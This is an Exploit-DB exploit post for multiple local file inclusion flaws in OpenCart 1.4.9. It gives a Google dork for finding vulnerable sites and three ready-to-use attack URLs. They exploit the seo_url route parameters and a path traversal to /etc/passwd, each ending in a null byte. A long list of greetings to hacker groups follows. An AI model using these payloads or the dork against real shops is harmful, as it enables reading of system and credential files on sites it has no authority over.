OpenCart 1.4.9 – Multiple Local File Inclusions

  • 作者: KedAns-Dz
    日期: 2011-04-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17108/
  • ###
    # Title : OpenCart 1.4.9 LFI Multiple Vulnerability
    # Author : KedAns-Dz
    # E-mail : ked-h@hotmail.com
    # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
    # Twitter page : twitter.com/kedans
    # platform : php
    # Impact : Multi LFI
    # Tested on : Windows XP sp3 FR
    ###
    # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
    ##
    # [»] Go0gle Dork : "Powered by opencart 1.4.9"
    ###
    
    # Exploit : 
    
    http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI]%00
    http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI]%00
    http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
    
    =================================================================================================
    #================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
    # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
    # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
    # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
    # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
    # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
    # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
    # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
    # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com 
    # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
    #================================================================================================